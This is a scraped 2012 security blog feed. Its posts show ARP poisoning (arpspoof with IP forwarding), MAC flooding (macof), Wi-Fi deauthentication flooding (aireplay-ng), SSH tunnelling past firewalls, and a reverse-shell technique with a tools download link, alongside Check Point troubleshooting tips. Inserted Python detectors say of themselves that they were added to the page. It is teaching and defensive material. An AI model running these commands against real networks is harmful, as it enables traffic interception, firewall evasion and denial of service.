<strong>BTHaber</strong></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<strong>No:908 February 2013</strong><a href="http://2.bp.blogspot.com/-3SlM32s2b2g/UJ49FLGAnjI/AAAAAAAAAP0/k5LNkJr4cSc/s1600/btlogo.jpg" imageanchor="1" style="clear: left; cssfloat: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" rea="true" src="http://2.bp.blogspot.com/-3SlM32s2b2g/UJ49FLGAnjI/AAAAAAAAAP0/k5LNkJr4cSc/s1600/btlogo.jpg" /></a></div>
<a href="http://www.bthaber.com/merhaba-mobilite/">http://www.bthaber.com/merhaba-mobilite/</a><br />
<br />
<a href="http://www.bthaber.com/her-yerde-guvenlik/">http://www.bthaber.com/her-yerde-guvenlik/</a><br />
<br />
<a href="http://4.bp.blogspot.com/-OifN0LGOEGU/UR4NNaUhE_I/AAAAAAAAASo/fj37dZK0zSw/s1600/bthaber022013.JPG" imageanchor="1" style="clear: left; cssfloat: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-OifN0LGOEGU/UR4NNaUhE_I/AAAAAAAAASo/fj37dZK0zSw/s1600/bthaber022013.JPG" uea="true" /></a><br />
<strong>IT PRO </strong></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<strong>No:139 November 2012</strong></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<a href="http://4.bp.blogspot.com/-GWuG0CPw6Zk/UJ4_wblbsCI/AAAAAAAAAQU/QcYcDRMfDXg/s1600/itproimg.png" imageanchor="1" style="clear: left; cssfloat: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" rea="true" src="http://4.bp.blogspot.com/-GWuG0CPw6Zk/UJ4_wblbsCI/AAAAAAAAAQU/QcYcDRMfDXg/s1600/itproimg.png" /></a></div>
<a href="http://4.bp.blogspot.com/-mUV2u1P0MY8/UJ49hmjFirI/AAAAAAAAAQE/lwyFjDV_Pxs/s1600/itpro_cagdasulucan.jpg" imageanchor="1" style="clear: left; cssfloat: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" rea="true" src="http://4.bp.blogspot.com/-mUV2u1P0MY8/UJ49hmjFirI/AAAAAAAAAQE/lwyFjDV_Pxs/s1600/itpro_cagdasulucan.jpg" /></a><br />
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br />
<a href="http://www.computerworld.com.tr/bilgi-guvenligi-farkindaligi-artiyor">http://www.computerworld.com.tr/bilgi-guvenligi-farkindaligi-artiyor</a></div>
<strong>BTHaber</strong></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<strong>No:888 September 2012</strong><a href="http://2.bp.blogspot.com/-3SlM32s2b2g/UJ49FLGAnjI/AAAAAAAAAP0/k5LNkJr4cSc/s1600/btlogo.jpg" imageanchor="1" style="clear: left; cssfloat: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" rea="true" src="http://2.bp.blogspot.com/-3SlM32s2b2g/UJ49FLGAnjI/AAAAAAAAAP0/k5LNkJr4cSc/s1600/btlogo.jpg" /></a></div>
<br />
<a href="http://4.bp.blogspot.com/-BVw_9GSk9OA/UJ49v489p0I/AAAAAAAAAQM/Ly6LQwWGVGM/s1600/bthaber_cagdasulucan.JPG" imageanchor="1" style="clear: left; cssfloat: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" rea="true" src="http://4.bp.blogspot.com/-BVw_9GSk9OA/UJ49v489p0I/AAAAAAAAAQM/Ly6LQwWGVGM/s1600/bthaber_cagdasulucan.JPG" /></a><br />
<br />Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comtag:blogger.com,1999:blog-4695188025510390210.post-105856749592061762012-10-19T17:15:00.000+03:002012-10-22T11:25:31.883+03:00<br />
<strong>Reverse Connection Shell</strong><br />
<strong>Problem:</strong><br />
Unreachable server behind a firewall (simulation of a reverse shell)<br />
<strong>Solution:</strong><br />
A solution to this problem is to have the server (victim) reach out and connect to the client. In that case the client (attacker) listens on a port, say port 80, and the server attempts to connect every 5 seconds. If the client is not up, the server waits 5 seconds and tries again. If the client is up, the connection is established and the server hands a shell to the client. The client can then send commands, and they execute on the server side. This technique is called a reverse connection shell.<br />
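The pattern the solution describes (a host that retries the same destination and port every 5 seconds, whether or not anyone is listening) is exactly what a defender can look for in firewall logs. The script below is an added example written for this page, not part of the post or of its ReverseShell tools: it groups constructed log lines by source, destination and port, measures the interval between attempts and flags tuples whose intervals are regular. The log format, the thresholds and all addresses are assumptions for the example.

```python
"""Beaconing check for the reverse connection shell pattern (added example)."""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed firewall log lines (not real traffic). Assumed format:
# "<ISO timestamp> <src ip> <dst ip> <dst port> <action>"
# 10.0.0.5 retries 203.0.113.10:80 every 5 s; the first attempts are denied
# because the listener is not up yet, exactly as the post describes.
SAMPLE_LOG = """\
2012-10-19T17:00:00 10.0.0.5 203.0.113.10 80 deny
2012-10-19T17:00:05 10.0.0.5 203.0.113.10 80 deny
2012-10-19T17:00:10 10.0.0.5 203.0.113.10 80 deny
2012-10-19T17:00:15 10.0.0.5 203.0.113.10 80 accept
2012-10-19T17:00:20 10.0.0.5 203.0.113.10 80 accept
2012-10-19T17:00:25 10.0.0.5 203.0.113.10 80 accept
2012-10-19T17:00:03 10.0.0.7 198.51.100.20 80 accept
2012-10-19T17:00:05 10.0.0.7 198.51.100.20 80 accept
2012-10-19T17:00:35 10.0.0.7 198.51.100.20 80 accept
2012-10-19T17:00:36 10.0.0.7 198.51.100.20 80 accept
2012-10-19T17:02:06 10.0.0.7 198.51.100.20 80 accept
"""


def parse_log(text):
    """Group connection timestamps by (src, dst, dport)."""
    events = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport, _action = line.split()
        events[(src, dst, int(dport))].append(datetime.fromisoformat(ts))
    return events


def find_beacons(events, min_hits=5, max_cv=0.2):
    """Return {(src, dst, dport): mean interval in seconds} for tuples whose
    inter-connection gaps are regular, i.e. stdev / mean is at or below max_cv.
    Denied attempts count too: a reverse shell that cannot reach its listener
    keeps knocking, and that shows up as a steady stream of denies."""
    beacons = {}
    for key, times in events.items():
        if len(times) < min_hits:
            continue
        times = sorted(times)
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue
        if pstdev(gaps) / avg <= max_cv:
            beacons[key] = round(avg, 1)
    return beacons


if __name__ == "__main__":
    for (src, dst, dport), interval in find_beacons(parse_log(SAMPLE_LOG)).items():
        print(f"{src} -> {dst}:{dport} beacons every {interval}s")
```

The browsing host 10.0.0.7 has irregular gaps and is not reported; the retrying host is reported with its 5 second interval. On real logs raise min_hits and widen the window, since a client that beacons every few minutes needs hours of data before the regularity is statistically visible.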
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-J2RNnFQclj8/UIFfkcmETfI/AAAAAAAAAPE/5QbAAaHyFjY/s1600/Capture_RS_cagdas.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="195" nea="true" src="http://1.bp.blogspot.com/-J2RNnFQclj8/UIFfkcmETfI/AAAAAAAAAPE/5QbAAaHyFjY/s400/Capture_RS_cagdas.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-zzypjnkNEnU/UIFiYSL1IFI/AAAAAAAAAPY/zaZNc-QavzY/s1600/RS_Exit.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="49" nea="true" src="http://2.bp.blogspot.com/-zzypjnkNEnU/UIFiYSL1IFI/AAAAAAAAAPY/zaZNc-QavzY/s320/RS_Exit.JPG" width="320" /></a></div>
<br />
<strong>Download from the link below</strong><br />
<br />
<a href="https://docs.google.com/open?id=0B0EDab8sQhCCQ0JsemtaMHdkMm8" target="_blank">Download ReverseShell Tools</a> by Cagdas Ulucan<br />
Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comtag:blogger.com,1999:blog-4695188025510390210.post-86036083993348402942012-10-15T17:18:00.000+03:002012-10-16T16:47:32.554+03:00<br />
<strong>Bypass non-L7 Firewall/Proxy systems (SSH Tunnelling)</strong><br />
By tunnelling techniques it is possible to pass through non-L7 firewalls, because they do not inspect the content of the packet.<br />
Ports 80 and 443 are usually allowed for internal users, and the SSH protocol supports a SOCKS proxy, so this can be used to connect to remote SSH servers that listen on port 443; you may set up your own or find public SSH servers on the net.<br />
<br />
Here is the screenshot of doing it via PuTTY<br />
<br />
<a href="http://4.bp.blogspot.com/-FdnqVhwQ5XQ/UHwaI2rRcsI/AAAAAAAAAOg/AfHNj_tWLiU/s1600/Capture12.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="307" nea="true" src="http://4.bp.blogspot.com/-FdnqVhwQ5XQ/UHwaI2rRcsI/AAAAAAAAAOg/AfHNj_tWLiU/s320/Capture12.JPG" width="320" /></a><br />
<a href="http://2.bp.blogspot.com/-2v1DvwiZRWo/UHwaNua_fZI/AAAAAAAAAOo/s-_7T6ktEHg/s1600/Capture13.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="134" nea="true" src="http://2.bp.blogspot.com/-2v1DvwiZRWo/UHwaNua_fZI/AAAAAAAAAOo/s-_7T6ktEHg/s320/Capture13.JPG" width="320" /></a><br />
<a href="http://1.bp.blogspot.com/-BzKktNoH5ro/UHwaQNuA6lI/AAAAAAAAAOw/Ah7c85xaVE8/s1600/Capture14.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" nea="true" src="http://1.bp.blogspot.com/-BzKktNoH5ro/UHwaQNuA6lI/AAAAAAAAAOw/Ah7c85xaVE8/s320/Capture14.JPG" width="296" /></a><br />
<br />
Some other ways of getting out are proxy software like Ultrasurf, a VPN to the outside, or remote connection software like TeamViewer (reverse connection); note that all of these techniques use port 443<br />
<br />
<br />
<strong>I wanted to draw your attention to the importance of inspecting SSL traffic, as it can be used for several illegal connections that can cause data leakage in your network</strong><br />
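The reason a port-based firewall lets SSH through on 443, and what an L7 inspection adds, can be shown with a few bytes. The classifier below is an added example for this page (not from the post, PuTTY or any firewall product): it compares the first bytes a client sends with the protocol expected on the destination port. The byte samples and the expected-protocol table are constructed for the example.

```python
"""First-bytes protocol classification: what an L7 check adds over a port filter (added example)."""

# A TLS record starts with content type 0x16 (handshake) and a 0x03 0x0x version;
# an SSH connection starts with the ASCII identification string "SSH-" (RFC 4253);
# an HTTP request starts with a method token followed by a space.
TLS_HANDSHAKE = 0x16
HTTP_METHODS = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"DELETE ", b"OPTIONS ", b"CONNECT ")


def classify_stream(first_bytes):
    """Return 'tls', 'ssh', 'http' or 'unknown' for the first bytes a client sends."""
    if (len(first_bytes) >= 3 and first_bytes[0] == TLS_HANDSHAKE
            and first_bytes[1] == 0x03 and first_bytes[2] <= 0x04):
        return "tls"
    if first_bytes.startswith(b"SSH-"):
        return "ssh"
    if first_bytes.startswith(HTTP_METHODS):
        return "http"
    return "unknown"


def port_only_verdict(dport, allowed=(80, 443)):
    """What a non-L7 firewall does: decide on the destination port alone."""
    return "allow" if dport in allowed else "deny"


# Assumed policy for the example: the protocol a defender expects on each allowed port.
EXPECTED_ON_PORT = {80: "http", 443: "tls"}


def l7_verdict(dport, first_bytes, expected=EXPECTED_ON_PORT):
    """What an application-aware filter does: allow only when the payload
    matches the protocol expected on that port."""
    if dport not in expected:
        return "deny"
    return "allow" if classify_stream(first_bytes) == expected[dport] else "deny"


# Constructed samples (not captured traffic).
SSH_CLIENT_ID = b"SSH-2.0-OpenSSH_5.9\r\n"
TLS_CLIENT_HELLO = bytes([0x16, 0x03, 0x01, 0x00, 0xa5, 0x01, 0x00, 0x00, 0xa1, 0x03, 0x03]) + b"\x00" * 32
HTTP_REQUEST = b"GET / HTTP/1.1\r\nHost: example.com\r\n\r\n"


if __name__ == "__main__":
    for name, payload in (("ssh over 443", SSH_CLIENT_ID), ("tls over 443", TLS_CLIENT_HELLO)):
        print(f"{name}: port-only={port_only_verdict(443)} l7={l7_verdict(443, payload)}")
```

SSH on port 443 is allowed by the port-only rule and denied by the L7 rule. Note the limit of this check: the VPN and TeamViewer style tunnels the post mentions speak real TLS on 443 and pass it, which is why the author's point about inspecting the SSL traffic itself matters.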
<br />
Thx<br />
Cagdas<br />
<br />Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comtag:blogger.com,1999:blog-4695188025510390210.post-56581760115230450842012-10-09T21:13:00.001+03:002012-10-10T15:07:15.767+03:00<br />
<strong>How to Convert victim switch to a HUB</strong><br />
<strong>First way</strong><br />
<strong>ARP Poisoning (arpspoof)</strong><br />
The attack is based on a weakness of the ARP protocol; it is very old and limited to local network segments, but still one of the biggest threats on L2 networks.<br />
Enable routing on the attacker so that it can route the traffic back to the victim; this is required if you do not want to cause a DoS but silently listen to the traffic.<br />
# echo 1 > /proc/sys/net/ipv4/ip_forward (enables IP forwarding in the Linux kernel)<br />
To test what is going on at the victim machine, type arp -a and check the MAC of the victim's gateway; once poisoning starts, the value changes to the attacker's MAC address.<br />
<br />
Let's start.<br />
First SSH session:<br />
# arpspoof -t victimip gwip<br />
Second SSH session:<br />
# arpspoof -t gwip victimip<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-aV-yPp8dkoI/UHRpEhjKwyI/AAAAAAAAAOM/bp56XiqbdAw/s1600/asrspoof.JPG" imageanchor="1" style="clear: left; cssfloat: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" nea="true" src="http://4.bp.blogspot.com/-aV-yPp8dkoI/UHRpEhjKwyI/AAAAAAAAAOM/bp56XiqbdAw/s1600/asrspoof.JPG" /></a></div>
<br />
<strong>Protection from ARP Poisoning</strong><br />
Enable Dynamic ARP Inspection on the related switch.<br />
<br />
If you have a DHCP server:<br />
Cisco(config)# IP dhcp snooping vlan <br />
Cisco(config)# IP arp inspection vlan <br />
Cisco(config)# interface GigabitEthernet 1/11 <br />
Cisco(config-if)# IP dhcp snooping trust <br />
Cisco(config-if)# IP arp inspection trust<br />
<br />
If not, you have to set static IP-MAC bindings manually:<br />
Cisco(config)# IP arp inspection vlan <br />
Cisco(config)# IP source binding vlan interface Gi1/1 <br />
Cisco(config)# arp access-list <br />
Cisco(config-arp-acl)# permit IP host mac host <br />
Cisco(config)# IP arp inspection filter vlan<br />
<br />
<strong>Second way</strong><br />
<strong>MAC Flooding</strong> attacks a switched network with lots of bogus ARP packets, overloading the switch's CAM table and making it act like a hub.<br />
A typical switch can handle a few thousand ARP records and can be overloaded.<br />
Once it is overloaded you may start sniffing..<br />
<br />
You may use the tool macof:<br />
# macof -i eth0<br />
<br />
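A small monitor that performs the two checks the protections in this post rely on is given below, for both the ARP poisoning and the MAC flooding sections: Dynamic ARP Inspection compares each ARP reply against a binding table, and Port Security caps the number of source MACs a port may present. It is an added example, not code from the post, from arpspoof or macof, and not Cisco's implementation; the binding table, port names and frame records are constructed for the example.

```python
"""ARP inspection and port-security style checks at the monitor side (added example)."""
from collections import defaultdict

# Static IP-to-MAC bindings the operator trusts (constructed): the same data a
# "no DHCP server" DAI deployment puts into ip source binding / arp access-list.
TRUSTED_BINDINGS = {
    "192.168.1.1": "00:11:22:33:44:01",   # gateway
    "192.168.1.10": "00:11:22:33:44:10",  # victim workstation
}


def check_arp_reply(sender_ip, sender_mac, bindings=TRUSTED_BINDINGS):
    """Mirror Dynamic ARP Inspection: None if the reply matches the binding table,
    otherwise an alert string. A poisoned gateway entry shows up here as the
    gateway IP being claimed by a MAC other than the bound one."""
    expected = bindings.get(sender_ip)
    if expected is None:
        return f"unknown binding: {sender_ip} claimed by {sender_mac}"
    if expected.lower() != sender_mac.lower():
        return f"ARP poisoning suspected: {sender_ip} is bound to {expected}, reply says {sender_mac}"
    return None


class PortSecurityMonitor:
    """Mirror Port Security: track distinct source MACs per port and alert when a
    port exceeds its maximum, which is what a CAM-table flood looks like."""

    def __init__(self, max_macs=5):
        self.max_macs = max_macs
        self.seen = defaultdict(set)

    def observe(self, port, src_mac):
        self.seen[port].add(src_mac.lower())
        count = len(self.seen[port])
        if count > self.max_macs:
            return f"MAC flooding suspected on {port}: {count} source MACs (max {self.max_macs})"
        return None


def run_monitor(frames, max_macs=5):
    """Process frame records (port, src_mac, arp_sender_ip, arp_sender_mac);
    the two ARP fields are None for frames that are not ARP replies."""
    port_security = PortSecurityMonitor(max_macs)
    alerts = []
    for port, src_mac, sender_ip, sender_mac in frames:
        alert = port_security.observe(port, src_mac)
        if alert:
            alerts.append(alert)
        if sender_ip is not None:
            alert = check_arp_reply(sender_ip, sender_mac)
            if alert:
                alerts.append(alert)
    return alerts


# Constructed frames: normal traffic, then a host on Gi1/3 (44:99) claims the
# gateway IP in an ARP reply, then the same port emits six more random source MACs.
SAMPLE_FRAMES = [
    ("Gi1/1", "00:11:22:33:44:10", None, None),
    ("Gi1/2", "00:11:22:33:44:01", "192.168.1.1", "00:11:22:33:44:01"),
    ("Gi1/3", "00:11:22:33:44:99", "192.168.1.1", "00:11:22:33:44:99"),
] + [("Gi1/3", f"02:00:00:00:00:{i:02x}", None, None) for i in range(6)]


if __name__ == "__main__":
    for line in run_monitor(SAMPLE_FRAMES):
        print(line)
```

The monitor keeps alerting for every frame past the limit; a switch with Port Security enabled instead shuts the port (or drops the frames) on the first violation, which is why the post can say the protection is simply enabling it.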
Protection against this attack is simply enabling Port Security.<br />
Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comtag:blogger.com,1999:blog-4695188025510390210.post-71378320157858606642012-10-04T11:21:00.004+03:002012-10-05T09:38:35.312+03:00<br />
<strong>DOS on Wireless Networks (wlan jammer)</strong><br />
<strong>Deauthentication attack on wireless networks</strong><br />
As a result, everyone on the attacked network is kicked off it; we may say it is simply a DoS.<br />
<br />
The connection between the mesh clients and the mesh APs is established by the exchange of various frames. After that, a series of management frames such as authentication and association request frames is exchanged. Because these frames are unprotected and sent in the clear, they can be spoofed by the attacker. The attacker sends deauthentication requests with the client's address set as the source; the mesh AP then responds by sending the deauthentication response to the client, so the communication between the client and the AP is halted. Since deauthentication requests are notifications, they cannot be ignored, and the AP responds to them instantly. The attacker can periodically scan all channels and send these spoofed messages to valid clients, terminating their connections.<br />
<br />
During the attack the client is deauthenticated and may therefore probe other networks and connect to any other mesh AP in range with good signal strength. The second stage of this DoS can be a rogue AP attack.<br />
<br />
<strong># airmon-ng</strong> (shows your WLAN interfaces)<br />
<strong># airmon-ng start wlan0</strong> (enables monitor mode on wlan0)<br />
<strong># airodump-ng mon0</strong> (gets the related info of the victim AP)<br />
<strong># airodump-ng -c 11 -b 1C:65:9D:B5:D8:C1 mon0</strong> (focuses on the related AP by defining channel and MAC)<br />
<strong># aireplay-ng --deauth 100 -c FF:FF:FF:FF:FF:FF -a 1C:65:9D:B5:D8:C1 mon0</strong> (starts sending deauthentication packets; open a separate SSH session for it)<br />
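From the monitoring side, the attack above looks like a burst of deauthentication frames carrying one BSSID as source, usually addressed to the broadcast address. The detector below is an added example for this page, not part of the post or of the aircrack-ng suite: it counts deauthentication frames per BSSID in a sliding one-second window over constructed frame records (the timestamps, BSSIDs and threshold are assumptions). The standard mitigation is 802.11w Protected Management Frames, which authenticates deauthentication frames so that spoofed ones are discarded by the client.

```python
"""Deauthentication flood detector over monitor-mode frame records (added example)."""
from collections import defaultdict, deque

DEAUTH = "deauth"
BROADCAST = "ff:ff:ff:ff:ff:ff"


class DeauthDetector:
    """Count deauthentication frames per source BSSID inside a sliding window and
    alert once when a BSSID crosses the threshold. Window and threshold are
    assumptions for the example; tune them to what your APs normally emit."""

    def __init__(self, window_s=1.0, threshold=10):
        self.window_s = window_s
        self.threshold = threshold
        self.recent = defaultdict(deque)   # bssid -> timestamps inside the window
        self.alerted = set()

    def feed(self, ts, subtype, src, dst):
        """Return an alert string or None for one (timestamp, subtype, src, dst) record."""
        if subtype != DEAUTH:
            return None
        window = self.recent[src]
        window.append(ts)
        while window and ts - window[0] > self.window_s:
            window.popleft()
        if len(window) >= self.threshold and src not in self.alerted:
            self.alerted.add(src)
            target = "broadcast (all clients)" if dst == BROADCAST else dst
            return f"deauth flood from {src} to {target}: {len(window)} frames in {self.window_s}s"
        return None


def scan(frames, **kwargs):
    """Run the detector over a list of frame records and return the alerts."""
    detector = DeauthDetector(**kwargs)
    alerts = []
    for frame in frames:
        alert = detector.feed(*frame)
        if alert:
            alerts.append(alert)
    return alerts


# Constructed capture, not a real pcap: AP1 sends two ordinary deauths a minute
# apart (a client roamed away), then frames spoofed with AP2's BSSID hit the
# broadcast address 20 times per second, which is how the attack above looks on the air.
AP1 = "00:aa:bb:cc:dd:01"
AP2 = "00:aa:bb:cc:dd:02"
SAMPLE_FRAMES = [
    (0.0, DEAUTH, AP1, "00:11:22:33:44:55"),
    (1.0, "beacon", AP1, BROADCAST),
    (60.0, DEAUTH, AP1, "00:11:22:33:44:66"),
] + [(120.0 + i * 0.05, DEAUTH, AP2, BROADCAST) for i in range(100)]


if __name__ == "__main__":
    for alert in scan(SAMPLE_FRAMES):
        print(alert)
```

The two legitimate deauthentications from AP1 never fill the window, so only the spoofed BSSID is reported, and only once per flood.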
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-96akLT_3mc8/UG1GueA-NII/AAAAAAAAANw/DayWTezUkao/s1600/Capture1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="247" mea="true" src="http://3.bp.blogspot.com/-96akLT_3mc8/UG1GueA-NII/AAAAAAAAANw/DayWTezUkao/s400/Capture1.JPG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-XNbSX_zIOyk/UG1G1LAvPfI/AAAAAAAAAN4/khrPmdf5drU/s1600/Capture2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="157" mea="true" src="http://1.bp.blogspot.com/-XNbSX_zIOyk/UG1G1LAvPfI/AAAAAAAAAN4/khrPmdf5drU/s400/Capture2.JPG" width="400" /></a></div>
<br />
I also decided to write about things other than Checkpoint;<br />
more pentest-related notes will be on this site.<br />
<br />
Thx <br />
Cagdas<br />
Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comtag:blogger.com,1999:blog-4695188025510390210.post-46503059497286857162012-09-14T17:50:00.002+03:002012-12-11T17:56:24.913+02:00<br />
<strong>Checkpoint DDOS Protector</strong>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
Today I had a chance to deal with the new Checkpoint DDoS Protector device.</div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
Here is a short video that shows some attack vectors and the response of the DDoS appliance.</div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
There was a DDoS_8412 and an R75.45 FW between the hacker PC and the test victim.</div>
<br />
<iframe allowfullscreen="allowfullscreen" frameborder="0" height="315" src="http://www.youtube.com/embed/5rhw7zsiarQ" width="560"></iframe><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-4uOCw_BUEf0/UFNFjHJ5PhI/AAAAAAAAAL0/ynf_NBZWOdA/s1600/ddospic.jpg" imageanchor="1" style="height: 325px; margin-left: 1em; margin-right: 1em; width: 600px;"><img border="0" hea="true" height="142" src="http://1.bp.blogspot.com/-4uOCw_BUEf0/UFNFjHJ5PhI/AAAAAAAAAL0/ynf_NBZWOdA/s400/ddospic.jpg" width="400" /></a></div>
Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comtag:blogger.com,1999:blog-4695188025510390210.post-30271784129537965252012-08-31T13:45:00.001+03:002012-09-19T10:21:59.719+03:00<br />
<strong>Interface rx-drp on Checkpoint firewalls</strong><br />
If your Ethernet driver is bnx2, apply the related driver upgrade from sk80640.<br />
I also know that there are driver upgrades for e1000; search for them in support.<br />
To see the driver: # ethtool -i eth0<br />
<br />
Also remember to check the buffer size on the related interface:<br />
# ethtool -g eth0<br />
The related SK is sk42181.<br />
<br />
# netstat -i will show you the drop counts on interfaces.<br />
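The three commands above can be combined into one check. The script below is an added example, not a Check Point or SPLAT tool: it parses the output of netstat -i and of ethtool -g and lists every interface with a non-zero RX-DRP counter together with its current and maximum RX ring size. The outputs embedded in it are constructed samples in the standard net-tools and ethtool formats, not from a real gateway.

```python
"""rx-drp check: combine netstat -i and ethtool -g into one report (added example)."""
import re

# Constructed `netstat -i` output in the standard net-tools format (not a real gateway).
NETSTAT_I = """\
Kernel Interface table
Iface       MTU Met    RX-OK RX-ERR RX-DRP RX-OVR    TX-OK TX-ERR TX-DRP TX-OVR Flg
eth0       1500   0 91827364      0  12984      0 77261902      0      0      0 BMRU
eth1       1500   0  4418221      0      0      0  3900123      0      0      0 BMRU
lo        16436   0    12345      0      0      0    12345      0      0      0 LRU
"""

# Constructed `ethtool -g eth0` output, keyed by interface name.
ETHTOOL_G = {
    "eth0": """\
Ring parameters for eth0:
Pre-set maximums:
RX:             4096
RX Mini:        0
RX Jumbo:       0
TX:             4096
Current hardware settings:
RX:             256
RX Mini:        0
RX Jumbo:       0
TX:             256
""",
}


def parse_netstat_i(text):
    """Return {iface: RX-DRP} from the output of `netstat -i`."""
    drops = {}
    rx_drp_col = None
    for line in text.splitlines():
        cols = line.split()
        if cols and cols[0] == "Iface":
            rx_drp_col = cols.index("RX-DRP")
            continue
        if rx_drp_col is None or len(cols) <= rx_drp_col:
            continue
        drops[cols[0]] = int(cols[rx_drp_col])
    return drops


def parse_ethtool_g(text):
    """Return (current RX ring size, maximum RX ring size) from `ethtool -g` output,
    or (None, None) when the output is missing or unparseable."""
    maximums, current = {}, {}
    section = None
    for line in text.splitlines():
        if line.startswith("Pre-set maximums"):
            section = maximums
        elif line.startswith("Current hardware settings"):
            section = current
        elif section is not None:
            match = re.match(r"^(RX Mini|RX Jumbo|RX|TX):\s+(\d+)", line)
            if match:
                section[match.group(1)] = int(match.group(2))
    return current.get("RX"), maximums.get("RX")


def rx_drop_report(netstat_text, ethtool_outputs):
    """List interfaces with RX-DRP > 0 and whether their RX ring is below the maximum."""
    report = []
    for iface, drops in parse_netstat_i(netstat_text).items():
        if drops == 0:
            continue
        current, maximum = parse_ethtool_g(ethtool_outputs.get(iface, ""))
        report.append({
            "iface": iface,
            "rx_drp": drops,
            "rx_ring": current,
            "rx_ring_max": maximum,
            "ring_can_grow": current is not None and maximum is not None and current < maximum,
        })
    return report


if __name__ == "__main__":
    for entry in rx_drop_report(NETSTAT_I, ETHTOOL_G):
        print(entry)
```

In the constructed sample eth0 is dropping with its RX ring at 256 of a possible 4096, so the buffer size the post points to (sk42181) is the first thing to look at; a driver-side problem like the bnx2 case in sk80640 is what remains when the ring is already at its maximum.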
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-KOy4HEZVCdY/UECVi3mfDwI/AAAAAAAAALg/cFORwMYvel4/s1600/rx-drp-checkpoint.png" imageanchor="1" style="clear: left; cssfloat: left; float: left; height: 151px; margin-bottom: 1em; margin-right: 1em; width: 617px;"><img border="0" fea="true" height="97" src="http://3.bp.blogspot.com/-KOy4HEZVCdY/UECVi3mfDwI/AAAAAAAAALg/cFORwMYvel4/s400/rx-drp-checkpoint.png" width="400" /></a></div>
Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comtag:blogger.com,1999:blog-4695188025510390210.post-36680157813503860442012-08-31T13:43:00.000+03:002012-08-31T13:49:09.873+03:00<br />
<strong>Error: Page cannot be displayed. An error occurred while processing the request.</strong><br />
I encountered a strange error on the Mobile Access Blade; in my case it was related to IPS. Try this: uncheck IPS and Mobile Access in the firewall properties, install the policy, then re-check them and reinstall the security policy.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-UX19QRXZLMM/UECVDxKLQJI/AAAAAAAAALY/PLhsNPvLi7A/s1600/vpnpage.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" fea="true" height="185" src="http://4.bp.blogspot.com/-UX19QRXZLMM/UECVDxKLQJI/AAAAAAAAALY/PLhsNPvLi7A/s400/vpnpage.jpg" width="400" /></a></div>
Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comtag:blogger.com,1999:blog-4695188025510390210.post-63799903628447342432012-08-04T17:10:00.000+03:002012-09-16T13:07:41.168+03:00<br />
<strong>How to upgrade the software and migrate a distributed SmartCenter to a Full HA Cluster</strong><br />
This procedure is my solution method...<br />
<br />
Take an upgrade_export file from the source SMC, import it to your VM with the same name and upgrade it to the version you want.<br />
